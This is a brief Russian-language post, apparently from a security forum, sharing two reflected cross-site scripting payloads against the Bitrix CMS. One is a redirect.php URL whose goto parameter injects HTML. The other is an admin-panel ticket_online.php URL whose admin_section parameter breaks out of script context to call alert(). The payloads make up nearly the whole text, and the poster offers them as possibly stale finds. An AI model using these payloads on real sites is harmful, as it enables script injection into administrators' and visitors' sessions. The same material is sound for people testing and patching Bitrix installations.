http://site.net/bitrix/redirect.php?event1=pofig&event2=pofig&event3=pofig&goto="><h1>XSS (или http://site.net/bitrix/"><h1>xexe) ерунда, конечно, но всё-таки... и я вновь и вновь извиняюсь, если это уже не свежая инфа...
тоже еще одна хсс в самой же админки после капчи /bitrix/admin/ticket_online.php?ticket_id=1&owner_user_id=77&lang=&online_auto_refresh=999&admin_section=N'},17);alert()//